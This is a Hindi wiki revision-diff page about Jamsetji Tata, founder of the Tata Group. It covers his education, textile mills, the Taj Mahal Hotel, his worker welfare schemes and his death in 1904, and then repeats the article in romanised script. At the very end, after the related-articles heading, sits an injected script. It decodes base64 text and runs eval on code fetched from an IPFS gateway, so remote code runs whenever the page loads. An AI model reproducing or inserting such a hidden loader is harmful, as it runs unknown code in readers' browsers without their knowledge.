Difference between revisions of "जमशेद जी टाटा"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 42: Line 42:
 
'''जमशेदजी नुसीरवानजी टाटा''' (जन्म- [[3 मार्च]], 1839, [[गुजरात]]; मृत्यु- [[19 मई]], [[1904]], [[जर्मनी]]) [[भारत]] के विश्वप्रसिद्ध औद्योगिक घराने "टाटा समूह" के संस्थापक थे। भारतीय औद्योगिक क्षेत्र में जमशेदजी ने जो योगदान दिया, वह असाधारण और बहुत ही महत्त्वपूर्ण माना जाता है। उन्होंने भारतीय औद्योगिक विकास का मार्ग ऐसे समय में प्रशस्त किया था, जब उस दिशा में केवल यूरोपीय, विशेष रूप से [[अंग्रेज़]] ही कुशल समझे जाते थे। [[इंग्लैण्ड]] की अपनी प्रथम यात्रा से लौटकर जमशेदजी टाटा ने चिंचपोकली के एक तेल मिल को कताई-बुनाई मिल में परिवर्तित करके औद्योगिक जीवन का सूत्रपात किया था। टाटा साम्राज्य के जनक जमशेदजी के कार्य आज भी लोगों को प्रेरित एवं विस्मित करते हैं। भविष्य को भाँपने की अद्भुत क्षमता के बल पर ही उन्होंने एक स्वनिर्भर औद्योगिक भारत का सपना देखा था। उन्होंने वैज्ञानिक एवं तकनीकी शिक्षा के लिए बेहतरीन सुविधाएँ उपलब्ध करायीं और राष्ट्र को महाशक्ति बनने का मार्ग दिखाया।
 
'''जमशेदजी नुसीरवानजी टाटा''' (जन्म- [[3 मार्च]], 1839, [[गुजरात]]; मृत्यु- [[19 मई]], [[1904]], [[जर्मनी]]) [[भारत]] के विश्वप्रसिद्ध औद्योगिक घराने "टाटा समूह" के संस्थापक थे। भारतीय औद्योगिक क्षेत्र में जमशेदजी ने जो योगदान दिया, वह असाधारण और बहुत ही महत्त्वपूर्ण माना जाता है। उन्होंने भारतीय औद्योगिक विकास का मार्ग ऐसे समय में प्रशस्त किया था, जब उस दिशा में केवल यूरोपीय, विशेष रूप से [[अंग्रेज़]] ही कुशल समझे जाते थे। [[इंग्लैण्ड]] की अपनी प्रथम यात्रा से लौटकर जमशेदजी टाटा ने चिंचपोकली के एक तेल मिल को कताई-बुनाई मिल में परिवर्तित करके औद्योगिक जीवन का सूत्रपात किया था। टाटा साम्राज्य के जनक जमशेदजी के कार्य आज भी लोगों को प्रेरित एवं विस्मित करते हैं। भविष्य को भाँपने की अद्भुत क्षमता के बल पर ही उन्होंने एक स्वनिर्भर औद्योगिक भारत का सपना देखा था। उन्होंने वैज्ञानिक एवं तकनीकी शिक्षा के लिए बेहतरीन सुविधाएँ उपलब्ध करायीं और राष्ट्र को महाशक्ति बनने का मार्ग दिखाया।
 
==जन्म तथा शिक्षा==
 
==जन्म तथा शिक्षा==
जमशेदजी टाटा का जन्म सन 1839 में [[गुजरात]] के एक छोटे-से कस्बे नवसेरी में हुआ था। उनका परिवार [[पारसी]] पुजारियों का था। उनके [[पिता]] का नाम नुसीरवानजी तथा [[माता]] का नाम जीवनबाई टाटा था। पारसी पादरियों के अपने ख़ानदान में नुसीरवानजी पहले व्यवसायी व्यक्ति थे। जमशेदजी का भाग्य उन्हें मात्र चौदह वर्ष की अल्पायु में ही पिता के साथ [[बंबई]] (वर्तमान [[मुम्बई]]) ले आया। यहाँ उन्होंने व्यवसाय (धंधे) में क़दम रखा। जमशेदजी अपनी छोटी नाज़ुक उम्र में ही पिता का साथ देने लगे थे। सत्रह वर्ष की आयु में जमशेदजी ने 'एलफ़िंसटन कॉलेज', मुम्बई में प्रवेश ले लिया। इसी कॉलेज से वे दो वर्ष बाद 'ग्रीन स्कॉलर' के रूप में उत्तीर्ण हुए। तत्कालीन समय में यह उपाधि ग्रेजुएट के बराबर हुआ करती थी।<ref>{{cite web |url= http://ranchiexpress.com/145884|title=राष्ट्र निर्माण के प्रेणेताओं में अग्रणी थे- जमशेदजी टाटा|accessmonthday= 2 मार्च|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
जमशेदजी टाटा का जन्म सन 1839 में [[गुजरात]] के एक छोटे-से कस्बे नवसेरी में हुआ था। उनका परिवार [[पारसी]] पुजारियों का था। उनके [[पिता]] का नाम नुसीरवानजी तथा [[माता]] का नाम जीवनबाई टाटा था। पारसी पादरियों के अपने ख़ानदान में नुसीरवानजी पहले व्यवसायी व्यक्ति थे। जमशेदजी का भाग्य उन्हें मात्र चौदह वर्ष की अल्पायु में ही पिता के साथ [[बंबई]] (वर्तमान [[मुम्बई]]) ले आया। यहाँ उन्होंने व्यवसाय (धंधे) में क़दम रखा। जमशेदजी अपनी छोटी नाज़ुक उम्र में ही पिता का साथ देने लगे थे। सत्रह वर्ष की आयु में जमशेदजी ने 'एलफ़िंसटन कॉलेज', मुम्बई में प्रवेश ले लिया। इसी कॉलेज से वे दो वर्ष बाद 'ग्रीन स्कॉलर' के रूप में उत्तीर्ण हुए। तत्कालीन समय में यह उपाधि ग्रेजुएट के बराबर हुआ करती थी।<ref name="ab">{{cite web |url= http://ranchiexpress.com/145884|title=राष्ट्र निर्माण के प्रेणेताओं में अग्रणी थे- जमशेदजी टाटा|accessmonthday= 2 मार्च|accessyear= 2013|last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
 
==व्यवसायिक जीवन की शुरुआत==
 
==व्यवसायिक जीवन की शुरुआत==
 
सुदूर पूर्व और [[यूरोप]] में अपने शुरू-शुरू के व्यापारिक उद्यमों के बाद जमशेदजी टाटा ने वर्ष [[1868]] में 29 साल की उम्र में 21 हज़ार रुपये की पूंजी के साथ एक निजी फर्म प्रारंभ की। वे कई बार मैनचेस्टर जा चुके थे और इसी दौरान उनके मन में कपड़ा मिल शुरू करने का विचार आया। अपने कुछ दोस्तों की साझेदारी में उन्होंने एक पुरानी तेल मिल खरीदी और उसे कपड़ा मिल में बदल दिया और फिर दो साल बाद उसे मुनाफे पर बेच दिया। इसके बाद जमशेदजी ने अपनी मिल उस प्रदेश में लगाने की सोची, जहाँ [[कपास]] की पैदावार अधिक होती थी। इस कार्य के लिए उन्होंने [[नागपुर]] को चुना। वर्ष [[1874]] में उन्होंने अपने दोस्तों के समर्थन से पन्द्रह लाख रुपये की पूंजी से एक नई कंपनी शुरू की। कंपनी का नाम रखा 'सेंट्रल इंडिया स्पिनिंग, वीविंग एंड मैनुफैक्चरिंग कंपनी'। [[1 जनवरी]], [[1877]] को यह मिल ने कार्य करना प्रारम्भ किया। बाद के समय में इसका नाम बदलकर 'इम्प्रेस मिल' कर दिया गया।
 
सुदूर पूर्व और [[यूरोप]] में अपने शुरू-शुरू के व्यापारिक उद्यमों के बाद जमशेदजी टाटा ने वर्ष [[1868]] में 29 साल की उम्र में 21 हज़ार रुपये की पूंजी के साथ एक निजी फर्म प्रारंभ की। वे कई बार मैनचेस्टर जा चुके थे और इसी दौरान उनके मन में कपड़ा मिल शुरू करने का विचार आया। अपने कुछ दोस्तों की साझेदारी में उन्होंने एक पुरानी तेल मिल खरीदी और उसे कपड़ा मिल में बदल दिया और फिर दो साल बाद उसे मुनाफे पर बेच दिया। इसके बाद जमशेदजी ने अपनी मिल उस प्रदेश में लगाने की सोची, जहाँ [[कपास]] की पैदावार अधिक होती थी। इस कार्य के लिए उन्होंने [[नागपुर]] को चुना। वर्ष [[1874]] में उन्होंने अपने दोस्तों के समर्थन से पन्द्रह लाख रुपये की पूंजी से एक नई कंपनी शुरू की। कंपनी का नाम रखा 'सेंट्रल इंडिया स्पिनिंग, वीविंग एंड मैनुफैक्चरिंग कंपनी'। [[1 जनवरी]], [[1877]] को यह मिल ने कार्य करना प्रारम्भ किया। बाद के समय में इसका नाम बदलकर 'इम्प्रेस मिल' कर दिया गया।
 
====व्यक्तित्व====
 
====व्यक्तित्व====
जमशेदजी के रूप में [[भारत]] को एक ऐसा व्यक्ति मिल गया था, जिसके पास नई-नई कल्पनाएँ और विचार थे। जिन्हें वह वास्तविकता में बदल सकता था। अपने लक्ष्यों को हासिल करने में उन्होंने अपनी संपदा, अनुभव और प्रतिष्ठा का उपयोग किया। अपने साथियों का पूरा सहयोग अधिकार भाव से प्राप्त करने का उनमें एक असाधारण गुण था। उनकी दिनचर्या काफ़ी सवेरे शुरू हो जाती थी। कभी-कभी वे [[मुम्बई]] के समुद्री तट पर टहलने निकल जाते। टहलते-टहलते कभी वे अपने दोस्तों के यहाँ पहुँच जाते। कई बार तो उनके दोस्त सोते ही रहते। नाश्ते के समय वे अपने परिवार, रिश्तेदारों और मित्रों से चर्चा करते थे। मध्याह्व तक अपने दफ्तर पहुँचने से पहले वे अध्ययन और लेखन कार्य अवश्य करते। दफ्तर के बाद वे अपनी घोड़ागाड़ी में सैर के लिए निकल पड़ते, या एलफिंस्टन क्लब में ताश खेलते और बातचीत करते। वहाँ से लौटकर खाना खाते। अच्छा खाना अगर उनकी कमजोरी थी तो दूसरी ओर ज्ञान की उनमें जबरदस्त प्यास भी विद्यमान थी।
+
जमशेदजी के रूप में [[भारत]] को एक ऐसा व्यक्ति मिल गया था, जिसके पास नई-नई कल्पनाएँ और विचार थे। जिन्हें वह वास्तविकता में बदल सकता था। अपने लक्ष्यों को हासिल करने में उन्होंने अपनी संपदा, अनुभव और प्रतिष्ठा का उपयोग किया। अपने साथियों का पूरा सहयोग अधिकार भाव से प्राप्त करने का उनमें एक असाधारण गुण था। उनकी दिनचर्या काफ़ी सवेरे शुरू हो जाती थी। कभी-कभी वे [[मुम्बई]] के समुद्री तट पर टहलने निकल जाते। टहलते-टहलते कभी वे अपने दोस्तों के यहाँ पहुँच जाते। कई बार तो उनके दोस्त सोते ही रहते। नाश्ते के समय वे अपने परिवार, रिश्तेदारों और मित्रों से चर्चा करते थे। मध्याह्व तक अपने दफ्तर पहुँचने से पहले वे अध्ययन और लेखन कार्य अवश्य करते। दफ्तर के बाद वे अपनी घोड़ागाड़ी में सैर के लिए निकल पड़ते, या एलफिंस्टन क्लब में ताश खेलते और बातचीत करते। वहाँ से लौटकर खाना खाते। अच्छा खाना अगर उनकी कमजोरी थी तो दूसरी ओर ज्ञान की उनमें जबरदस्त प्यास भी विद्यमान थी।<ref name="ab"/>
 
==होटल ताज का निर्माण==
 
==होटल ताज का निर्माण==
 
{{main|होटल ताज मुम्बई}}
 
{{main|होटल ताज मुम्बई}}
Line 53: Line 53:
 
जमशेदजी टाटा अपना ज्ञान बढ़ाने के लिए हमेशा तत्पर रहा करते थे। इसके साथ ही उनके व्यक्तित्व का एक और बड़ा गुण था, और वह था- सजगता। जिन दिनों [[मुम्बई]] में जानलेवा [[प्लेग]] विकराल रूप में फैली, तब जमशेदजी ने अपने सब काम एक ओर रख दिये और प्लेग के विभिन्न प्रकारों के इतिहास और उनके इलाज संबंधी अध्ययन में जुट गये। वे जानना चाहते थे कि इस भयानक बीमारी के फैलाव को कैसे रोका जा सकता है। मानवीय प्रयत्नों के हर क्षेत्र पर जमशेदजी ने सोचा और काम किया, हालाँकि उनकी याद मुख्यत: राष्ट्रीय महत्त्व की तीन परियोजनाओं और विख्यात 'ताजमहल होटल' के निर्माता के रूप में की जाती है। जमशेदजी जब भी विदेश जाते, अधिकतर खरीददारी खुद ही करते। [[यूरोप]] में जो भी श्रेष्ठ वस्तुएँ मिल सकती थीं, उन्हें जमशेदजी ने खरीदा और ताज पर न्योछावर कर दिया।
 
जमशेदजी टाटा अपना ज्ञान बढ़ाने के लिए हमेशा तत्पर रहा करते थे। इसके साथ ही उनके व्यक्तित्व का एक और बड़ा गुण था, और वह था- सजगता। जिन दिनों [[मुम्बई]] में जानलेवा [[प्लेग]] विकराल रूप में फैली, तब जमशेदजी ने अपने सब काम एक ओर रख दिये और प्लेग के विभिन्न प्रकारों के इतिहास और उनके इलाज संबंधी अध्ययन में जुट गये। वे जानना चाहते थे कि इस भयानक बीमारी के फैलाव को कैसे रोका जा सकता है। मानवीय प्रयत्नों के हर क्षेत्र पर जमशेदजी ने सोचा और काम किया, हालाँकि उनकी याद मुख्यत: राष्ट्रीय महत्त्व की तीन परियोजनाओं और विख्यात 'ताजमहल होटल' के निर्माता के रूप में की जाती है। जमशेदजी जब भी विदेश जाते, अधिकतर खरीददारी खुद ही करते। [[यूरोप]] में जो भी श्रेष्ठ वस्तुएँ मिल सकती थीं, उन्हें जमशेदजी ने खरीदा और ताज पर न्योछावर कर दिया।
 
==विदेश यात्राएँ==
 
==विदेश यात्राएँ==
अपनी युवावस्था में ही जमशेदजी ने [[चीन]], सुदूर पूर्व देशों, यूरोप, मध्य पूर्व और उत्तरी अमेरिका तक की यात्रा की थी। उन्होंने अपनी इन यात्राओं का लाभ विदेशों में इस्पात कारखानों, कोयला खानों और अन्य किस्म के कारखानों का अध्ययन करने की दृष्टि से उठाया। जब वे [[फ़्राँस]] में थे तो उन्होंने रेशम के कीड़े पालने की विधि का अध्ययन किया। जब वे [[1893]] में [[जापान]] गये तो जापानियों को रेशम की खेती के बारे में प्रयोग करने के लिए आमंत्रित किया। जलवायु के ख्याल से उन्होंने [[मैसूर]] को चुना और रेशम उद्योग को फिर से जीवित किया।
+
अपनी युवावस्था में ही जमशेदजी ने [[चीन]], सुदूर पूर्व देशों, यूरोप, मध्य पूर्व और उत्तरी अमेरिका तक की यात्रा की थी। उन्होंने अपनी इन यात्राओं का लाभ विदेशों में इस्पात कारखानों, कोयला खानों और अन्य किस्म के कारखानों का अध्ययन करने की दृष्टि से उठाया। जब वे [[फ़्राँस]] में थे तो उन्होंने रेशम के कीड़े पालने की विधि का अध्ययन किया। जब वे [[1893]] में [[जापान]] गये तो जापानियों को रेशम की खेती के बारे में प्रयोग करने के लिए आमंत्रित किया। जलवायु के ख्याल से उन्होंने [[मैसूर]] को चुना और रेशम उद्योग को फिर से जीवित किया।<ref name="ab"/>
 +
====दृढ़ निश्चयी====
 +
वर्ष [[1886]] में जमशेदजी ने एक 'पेंशन फंड' प्रारंभ किया और [[1885]] में ही वे दुर्घटनाग्रस्त लोगों को मुआवजा देने लगे। अब 'इम्प्रेस मिल' ने यह दिखा दिया था कि उनकी निगाह सिर्फ़ मुनाफे पर नहीं थी, उनके साथ काम करने वाले लोग भी उनके लिए महत्वपूर्ण थे। [[1886]] में तो वे एक ऐसी मिल खरीदने का इरादा करने लगे, जो उस क्षेत्र के कई महारथियों के लिए हानिप्रद सिद्ध हुई थी। इस समय तक जमशेदजी 47 वर्ष के हो चुके थे। उन्होंने एक बेकार मिल को चलाने की चुनौती स्वीकार कर ली। 'राष्ट्रीय स्वदेशी आंदोलन' की शुरुआत का संकेत देने के लिए मिल का नाम 'स्वदेशी मिल्स' रखा गया था। भारतीय शेयर होल्डरों से इसे भारी समर्थन मिला। उन्होंने जमशेदजी के काम में खुशी-खुशी पूँजी लगायी।
 +
==मजदूरों के चिंतक==
 +
एक उद्योगपति के रूप में जमशेदजी की प्रतिष्ठा बढ़ती जा रही थी। वे अपने उद्योग को जीवित रखने के संघर्ष में काफ़ी व्यस्त रहते थे और स्वास्थ्य की देखभाल के लिए समय नहीं निकाल पाते थे, फिर भी श्रमिकों के स्वास्थ्य के बारे में सोचने के लिए उनके पास काफ़ी समय रहता था। गंदा पानी अक्सर बीमारी की जड़ होता है। इसलिए उन्होंने [[जल]] के शुद्धीकरण के लिए एक प्लांट भी लगवाया। अनाज की एक दुकान मजदूरों के लिए खोली गई। इसके बाद उनके लिए एक अस्पताल भी खुल गया। वस्त्र उद्योग में उनके दो उद्यमों को कामयाबी मिल चुकी थी। लेकिन मुनाफे के लिए और ज़्यादा मिलें लगाने के बजाय उन्होंने एक अलग रास्ता चुना। वे [[भारत]] को बड़े पैमाने पर इस्पात और जलविद्युत देना चाहते थे, जबकि इन उद्यमों में अच्छा खासा जोखिम था। ऊँचे दर्जे के प्रबंधन कुशलताओं की जरूरत थी और मुनाफे की गति भी दुखदायी रूप से बहुत ही कम थी।<ref name="ab"/>
 +
====सर्वधर्म प्रेमी====
 +
इस्पात कारखाने की स्थापना के लिए स्थान का अंतिम रूप से चयन होने के ठीक पाँच साल पहले ही यानी [[1902]] में उन्होंने विदेश से अपने पुत्र दोराब को लिखा था कि- "उनके सपनों का इस्पात नगर कैसा होगा"। उन्होंने लिखा था कि- "इस बात का ध्यान रखना कि सड़कें चौड़ी हों। उनके किनारे तेजी से बढ़ने वाले छायादार पेड़ लगाये जाएँ। इस बात की भी सावधानी बरतना कि बाग़-बगीचों के लिए काफ़ी जगह छोड़ी जाये। फुटबॉल, [[हॉकी]] के लिए भी काफ़ी स्थान रखना। [[हिन्दू|हिन्दुओं]] के मंदिरों, [[मुस्लिम|मुस्लिमों]] की मस्जिदों तथा [[ईसाई|ईसाईयों]] के गिरजों के लिए नियत जगह मत भूलना।"
 
==मृत्यु==
 
==मृत्यु==
जमशेद जी टाटा ने 19 मई 1904 में [[जर्मनी]] में उन्होंने अपनी आख़िरी सांस ली ।<ref>{{cite web |url=http://www.pressnote.in/profile---jamshed-ji-tata_92339.html |title=जमशेद जी टाटा |accessmonthday=[[4 अप्रॅल]] |accessyear=[[2011]] |last= |first= |authorlink= |format= |publisher=प्रेसनोट |language=[[हिन्दी]] }}</ref>
+
जमशेदजी टाटा ने [[19 मई]], [[1904]] को [[जर्मनी]] के बादनौहाइम में अपने जीवन की अंतिम साँसें लीं। अपने आखिरी दिनों में पुत्र दोराब और परिवार के नजदीकी लोगों से उन्होंने उस काम को आगे बढ़ाते रहने के लिए कहा, जिसकी उन्होंने शुरुआत की थी। उनके योग्य उत्तराधिकारियों ने काम को सिर्फ़ जारी ही नहीं रखा, बल्कि उसे फैलाया भी। जमशेदजी की मृत्यु के बाद सर दोराब टाटा, उनके चचेरे भाई आर. डी. टाटा, बुरजोरजी पादशाह और अन्य लोगों ने टाटा उद्योग को आगे बढ़ाया। जमशेदजी ने कहा था कि- "अगर किसी देश को आगे बढ़ाना है तो उसके असहाय और कमजोर लोगों को सहारा देना ही सब कुछ नहीं है। समाज के सर्वोत्तम और प्रतिभाशाली लोगों को ऊँचा उठाना और उन्हें ऐसी स्थिति में पहुँचाना भी जरूरी है, जिससे कि वे देश की महान सेवा करने लायक बन सकें।"<ref name="ab"/>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक=|पूर्णता=|शोध=}}

Revision as of 08:52, 2 March 2013

jamashed ji tata
poora nam jamashedaji nusiravanaji tata
janm 3 march, 1839
janm bhoomi navaseri kasba, gujarat
mrityu 19 mee, 1904
mrityu sthan jarmani
pati/patni hira baee daboo
karm bhoomi mumbee
karm-kshetr udyogapati
prasiddhi mumbee ki shan taj mahal hotal ka nirman kiya.
nagarikata bharatiy
any janakari jamashedaji tata vartaman mean bharat ke vishvaprasiddh audyogik gharane tata samooh ke sansthapak the.
adyatan‎

jamashedaji nusiravanaji tata (janm- 3 march, 1839, gujarat; mrityu- 19 mee, 1904, jarmani) bharat ke vishvaprasiddh audyogik gharane "tata samooh" ke sansthapak the. bharatiy audyogik kshetr mean jamashedaji ne jo yogadan diya, vah asadharan aur bahut hi mahattvapoorn mana jata hai. unhoanne bharatiy audyogik vikas ka marg aise samay mean prashast kiya tha, jab us disha mean keval yooropiy, vishesh roop se aangrez hi kushal samajhe jate the. ianglaind ki apani pratham yatra se lautakar jamashedaji tata ne chianchapokali ke ek tel mil ko kataee-bunaee mil mean parivartit karake audyogik jivan ka sootrapat kiya tha. tata samrajy ke janak jamashedaji ke kary aj bhi logoan ko prerit evan vismit karate haian. bhavishy ko bhaanpane ki adbhut kshamata ke bal par hi unhoanne ek svanirbhar audyogik bharat ka sapana dekha tha. unhoanne vaijnanik evan takaniki shiksha ke lie behatarin suvidhaean upalabdh karayian aur rashtr ko mahashakti banane ka marg dikhaya.

janm tatha shiksha

jamashedaji tata ka janm san 1839 mean gujarat ke ek chhote-se kasbe navaseri mean hua tha. unaka parivar parasi pujariyoan ka tha. unake pita ka nam nusiravanaji tatha mata ka nam jivanabaee tata tha. parasi padariyoan ke apane khanadan mean nusiravanaji pahale vyavasayi vyakti the. jamashedaji ka bhagy unhean matr chaudah varsh ki alpayu mean hi pita ke sath banbee (vartaman mumbee) le aya. yahaan unhoanne vyavasay (dhandhe) mean qadam rakha. jamashedaji apani chhoti nazuk umr mean hi pita ka sath dene lage the. satrah varsh ki ayu mean jamashedaji ne 'elafiansatan k aaulej', mumbee mean pravesh le liya. isi k aaulej se ve do varsh bad 'grin sk aaular' ke roop mean uttirn hue. tatkalin samay mean yah upadhi grejuet ke barabar hua karati thi.[1]

vyavasayik jivan ki shuruat

sudoor poorv aur yoorop mean apane shuroo-shuroo ke vyaparik udyamoan ke bad jamashedaji tata ne varsh 1868 mean 29 sal ki umr mean 21 hazar rupaye ki pooanji ke sath ek niji pharm praranbh ki. ve kee bar mainachestar ja chuke the aur isi dauran unake man mean kap da mil shuroo karane ka vichar aya. apane kuchh dostoan ki sajhedari mean unhoanne ek purani tel mil kharidi aur use kap da mil mean badal diya aur phir do sal bad use munaphe par bech diya. isake bad jamashedaji ne apani mil us pradesh mean lagane ki sochi, jahaan kapas ki paidavar adhik hoti thi. is kary ke lie unhoanne nagapur ko chuna. varsh 1874 mean unhoanne apane dostoan ke samarthan se pandrah lakh rupaye ki pooanji se ek nee kanpani shuroo ki. kanpani ka nam rakha 'seantral iandiya spiniang, viviang eand mainuphaikchariang kanpani'. 1 janavari, 1877 ko yah mil ne kary karana prarambh kiya. bad ke samay mean isaka nam badalakar 'impres mil' kar diya gaya.

vyaktitv

jamashedaji ke roop mean bharat ko ek aisa vyakti mil gaya tha, jisake pas nee-nee kalpanaean aur vichar the. jinhean vah vastavikata mean badal sakata tha. apane lakshyoan ko hasil karane mean unhoanne apani sanpada, anubhav aur pratishtha ka upayog kiya. apane sathiyoan ka poora sahayog adhikar bhav se prapt karane ka unamean ek asadharan gun tha. unaki dinacharya kafi savere shuroo ho jati thi. kabhi-kabhi ve mumbee ke samudri tat par tahalane nikal jate. tahalate-tahalate kabhi ve apane dostoan ke yahaan pahuanch jate. kee bar to unake dost sote hi rahate. nashte ke samay ve apane parivar, rishtedaroan aur mitroan se charcha karate the. madhyahv tak apane daphtar pahuanchane se pahale ve adhyayan aur lekhan kary avashy karate. daphtar ke bad ve apani gho daga di mean sair ke lie nikal p date, ya elaphianstan klab mean tash khelate aur batachit karate. vahaan se lautakar khana khate. achchha khana agar unaki kamajori thi to doosari or jnan ki unamean jabaradast pyas bhi vidyaman thi.[1]

hotal taj ka nirman

  1. REDIRECTsaancha:mukhy

vishv prasiddh 'tajamahal hotal' sirf mumbee hi nahian balki sampoorn bharat mean khyatiprapt hai. 'tajamahal hotal' ke nirman ke pichhe ek rochak kahani chhupi huee hai. sinema ke janak lumayar bhaeeyoan ne apani khoj ke chh: mahinoan bad apani pahali film ka sho mumbee mean pradarshit kiya tha. vaise to ve aaustreliya ja rahe the, lekin bich raste mean unhone mumbee mean bhi sho rakhane ki bat sochi. 7 julaee, 1896 ko unhoanne mumbee ke tatkalin alishan votasan hotal mean apani chh: alag-alag filmoan ke sho ayojit kie. in sho ko dekhane ke lie matr british logoan ko hi amantrit kiya gaya tha, kyoanki votasan hotal ke bahar ek takhti lagi rahati thi, jis par likha hota tha ki "bharatiy aur kutte hotal mean nahian a sakate hai". 'tata samooh' ke jamashedaji tata bhi lumayar bhaeeyoan ki filmean dekhana chahate the, lekin unhean votasan hotal mean pravesh nahian mila. rangabhed ki is ghrinit niti ke khilaf unhonean avaj bhi uthaee. is ghatana ke do sal bad hi votasan hotal ki sari shobha dhoomil kar de, ek aise bhavy 'tajamahal hotal' ka nirman jamashedaji ne shuroo karava diya. 1903 ee. mean yah ati suandar hotal banakar taiyar ho gaya. kuchh samay tak is hotal ke daravaje par ek takhti bhi latakati thi, jis par likha hota tha ki- "british aur billiyaan aandar nahian a sakatian.[2] mumbee mean bijali ki roshani vali yah pahali imarat thi, aur anek darshak isilie isaki or akrisht hote the. isaki ganana sansar ke sarvashreshth hotaloan mean ki jane lagi thi. jamashedaji ka yah udyam unake any udyamoan ki tulana mean bilkul alag tha. sach to yah tha ki ve ise udyog ki tarah chalana bhi nahian chahate the. isilie unhoanne kharch ka kabhi hisab bhi nahian lagaya.

sajagata ka gun

jamashedaji tata apana jnan badhane ke lie hamesha tatpar raha karate the. isake sath hi unake vyaktitv ka ek aur b da gun tha, aur vah tha- sajagata. jin dinoan mumbee mean janaleva pleg vikaral roop mean phaili, tab jamashedaji ne apane sab kam ek or rakh diye aur pleg ke vibhinn prakaroan ke itihas aur unake ilaj sanbandhi adhyayan mean jut gaye. ve janana chahate the ki is bhayanak bimari ke phailav ko kaise roka ja sakata hai. manaviy prayatnoan ke har kshetr par jamashedaji ne socha aur kam kiya, halaanki unaki yad mukhyat: rashtriy mahattv ki tin pariyojanaoan aur vikhyat 'tajamahal hotal' ke nirmata ke roop mean ki jati hai. jamashedaji jab bhi videsh jate, adhikatar kharidadari khud hi karate. yoorop mean jo bhi shreshth vastuean mil sakati thian, unhean jamashedaji ne kharida aur taj par nyochhavar kar diya.

videsh yatraean

apani yuvavastha mean hi jamashedaji ne chin, sudoor poorv deshoan, yoorop, madhy poorv aur uttari amerika tak ki yatra ki thi. unhoanne apani in yatraoan ka labh videshoan mean ispat karakhanoan, koyala khanoan aur any kism ke karakhanoan ka adhyayan karane ki drishti se uthaya. jab ve fraans mean the to unhoanne resham ke ki de palane ki vidhi ka adhyayan kiya. jab ve 1893 mean japan gaye to japaniyoan ko resham ki kheti ke bare mean prayog karane ke lie amantrit kiya. jalavayu ke khyal se unhoanne maisoor ko chuna aur resham udyog ko phir se jivit kiya.[1]

dridh nishchayi

varsh 1886 mean jamashedaji ne ek 'peanshan phand' praranbh kiya aur 1885 mean hi ve durghatanagrast logoan ko muavaja dene lage. ab 'impres mil' ne yah dikha diya tha ki unaki nigah sirf munaphe par nahian thi, unake sath kam karane vale log bhi unake lie mahatvapoorn the. 1886 mean to ve ek aisi mil kharidane ka irada karane lage, jo us kshetr ke kee maharathiyoan ke lie haniprad siddh huee thi. is samay tak jamashedaji 47 varsh ke ho chuke the. unhoanne ek bekar mil ko chalane ki chunauti svikar kar li. 'rashtriy svadeshi aandolan' ki shuruat ka sanket dene ke lie mil ka nam 'svadeshi mils' rakha gaya tha. bharatiy sheyar holdaroan se ise bhari samarthan mila. unhoanne jamashedaji ke kam mean khushi-khushi pooanji lagayi.

majadooroan ke chiantak

ek udyogapati ke roop mean jamashedaji ki pratishtha badhati ja rahi thi. ve apane udyog ko jivit rakhane ke sangharsh mean kafi vyast rahate the aur svasthy ki dekhabhal ke lie samay nahian nikal pate the, phir bhi shramikoan ke svasthy ke bare mean sochane ke lie unake pas kafi samay rahata tha. ganda pani aksar bimari ki j d hota hai. isalie unhoanne jal ke shuddhikaran ke lie ek plaant bhi lagavaya. anaj ki ek dukan majadooroan ke lie kholi gee. isake bad unake lie ek aspatal bhi khul gaya. vastr udyog mean unake do udyamoan ko kamayabi mil chuki thi. lekin munaphe ke lie aur zyada milean lagane ke bajay unhoanne ek alag rasta chuna. ve bharat ko b de paimane par ispat aur jalavidyut dena chahate the, jabaki in udyamoan mean achchha khasa jokhim tha. ooanche darje ke prabandhan kushalataoan ki jaroorat thi aur munaphe ki gati bhi dukhadayi roop se bahut hi kam thi.[1]

sarvadharm premi

ispat karakhane ki sthapana ke lie sthan ka aantim roop se chayan hone ke thik paanch sal pahale hi yani 1902 mean unhoanne videsh se apane putr dorab ko likha tha ki- "unake sapanoan ka ispat nagar kaisa hoga". unhoanne likha tha ki- "is bat ka dhyan rakhana ki s dakean chau di hoan. unake kinare teji se badhane vale chhayadar pe d lagaye jaean. is bat ki bhi savadhani baratana ki bag-bagichoan ke lie kafi jagah chho di jaye. phutab aaul, h aauki ke lie bhi kafi sthan rakhana. hinduoan ke mandiroan, muslimoan ki masjidoan tatha eesaeeyoan ke girajoan ke lie niyat jagah mat bhoolana."

mrityu

jamashedaji tata ne 19 mee, 1904 ko jarmani ke badanauhaim mean apane jivan ki aantim saansean lian. apane akhiri dinoan mean putr dorab aur parivar ke najadiki logoan se unhoanne us kam ko age badhate rahane ke lie kaha, jisaki unhoanne shuruat ki thi. unake yogy uttaradhikariyoan ne kam ko sirf jari hi nahian rakha, balki use phailaya bhi. jamashedaji ki mrityu ke bad sar dorab tata, unake chachere bhaee ar. di. tata, burajoraji padashah aur any logoan ne tata udyog ko age badhaya. jamashedaji ne kaha tha ki- "agar kisi desh ko age badhana hai to usake asahay aur kamajor logoan ko sahara dena hi sab kuchh nahian hai. samaj ke sarvottam aur pratibhashali logoan ko ooancha uthana aur unhean aisi sthiti mean pahuanchana bhi jaroori hai, jisase ki ve desh ki mahan seva karane layak ban sakean."[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. 1.0 1.1 1.2 1.3 1.4 rashtr nirman ke prenetaoan mean agrani the- jamashedaji tata (hindi). . abhigaman tithi: 2 march, 2013.
  2. tajamahal hotal ke nirman ki rochak katha (hindi). . abhigaman tithi: 2 march, 2013.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>